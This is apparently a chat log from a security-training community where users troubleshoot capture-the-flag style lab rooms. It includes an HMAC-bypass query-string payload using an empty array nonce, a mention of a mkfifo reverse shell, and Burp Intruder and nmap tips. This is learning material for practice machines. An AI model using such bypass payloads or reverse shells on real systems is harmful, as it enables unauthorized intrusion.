||http://pwd.harder.local/index.php?n[]=&host=hacker.com&h=e86f889ce1872bcb2d54e7145c1a4b4d85ee32fdf4223ac345106a212f70b2bc || here is the link that i used
@rose moat can you show screenshots please?
apart from that room being buggy
harder?
um what ?
i dont see the welcome message when you connect, is that the correct port?
ping works but nothing from mkfifo
ah i thought you were answering my query on harder room
few scrolls up
I see
just above zavazkey question
one thing that I can see right away is that you forgot to assign a value to the n[]
@eternal brook here's my req
so it's null
aren't we supposed to assign null array
?nonce[]=&hostname=securify.nl&hmac=c8ef9458af67da9c9086078ad3acc8ae71713af4e27d35fd8d02d0078f7ca3f5 i copied this syntax that i saw in a blog
https://www.securify.nl/blog/spot-the-bug-challenge-2018-warm-up this blog seems quite similar...
oh ok
that works, but based off a different principle ig
if you are referring n, make sure it's not null
i tried putting values 0 and 1, still the same
the login page only pops up
i've re-run my vpn, rebooted the machine, don't know what else to try...
Have you understood what the php script actually does
Yeah my b. n array is supposed to be empty
the index.php calls 2 pages auth and hmac...
and there are variables that we can assign given the hmac page...
yeah the article should work just fine
but you actually can't use the nonce array
don't know why it isn't working
it's referred to as n in this room
||/n[]=&host=securify.nl&h=c8ef9458af67da9c9086078ad3acc8ae71713af4e27d35fd8d02d0078f7ca3f5||
doesn't work ?
i understood the concept i generated my hash using hmac function but still it's not working
i'll try 1 sec
nope
yea that's my tun0 ip
as in the "deployed " machine ip
@eternal brook Yea not that. That's your internal vpn ip
You get a login page when you visit the ---.harder.local yes ?
yess
try clicking on remember me, or you haven't figured out the "creds" yet ?
/n[]=1&host=ros.com&h=73aeb29c6c1c96be662ca4b240afe6bfc950c2f60d6c612e7b4f79a92d662701
here try the n[]=1
that's your machine
try with the exact same url as I sent you above, all are not same
make sure you check the "remember me" checkbox when logging in (that caused issues with my buddy)
ok alright thank you so much i'll try that too
no issues mann thanks a lot
Hi guys, new user here. Would really appreciate some help. I'm stuck in task 12, #1 in 'The OWASP Top 10'. I'm not sure which webapp it is referring to.
The webapp
Running on the VM
That you deployed for that task
Deploy button for it is in task 9
i'm looking at vulnversity, and when running nmap with the ||-O|| flag, to find the most likely OS, all it says is 'no exact OS matches for host', and doesn't tell me what the "most likely" OS is
- It's asking for the distro
- In the fingerprint it gives you, the OS is listed in there
- The distro tends to be in the SSH fingerprint or fingerprint for other services. Try a service version scan
if it meant distro why doesnt it say distro
Because no one has changed it yet
@stuck fractal I've deployed my machine and read through task 10 as well. Is it referring to the example.db?
Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
The web application
The website
Is the website the one mentioned in task 8?
When I hit deploy, I get my regular kali desktop screen. Which website?
You need to click the deploy button in the room
The Kali is for you to use to attack
You need to deploy the target machine
Have you completed the Welcome room yet?
Yes I have but I'll try again, one moment
I opened my tryhackme box and I only get a terminal window
The VM that you deploy on my-machine is your attacking machine
It is the machine you use to attack other machines
You need to deploy that other machine
With the deploy button. In task 9.
when I click the deploy in task 9, it says the machine is already running
Ok, then the IP address at the top of the page under Active Machine Information is the one that you need
Ok ill try that
What i did was typed [MY_IP]/login in firefox to get to the webapp. It's not opening anything. Am I in the right direction?
why are you typing your ip there, are you the one running the website?
also uh
there is no "sniper" attack type in the payloads tab
there is in the positions tab
wut
but if i just set it in there and start the attack after doing everything else, it says i need to do something in payloads, too
@trim haven
Click on "payload type"
tried that, there's nothing about "sniper" in there
Strange.
hold on, ive terminated and tried running it again
I can't remember from the last time I used the tool.
@copper dome it is not your ip that the website is running on
nvm i think i misunderstood the guide because it omitted some info
...or not, gdi
they're all allowed?
Room?
task 4
@royal venture Toggle the payload encoding
Needs to be off I think
Or on. Whatever it isn't now.
still all 200
Then you're doing something else wrong
well idk man im following the room exactly
And without context, we can't help
you need context, read the room, because i am doing exactly as it says
I've completed the room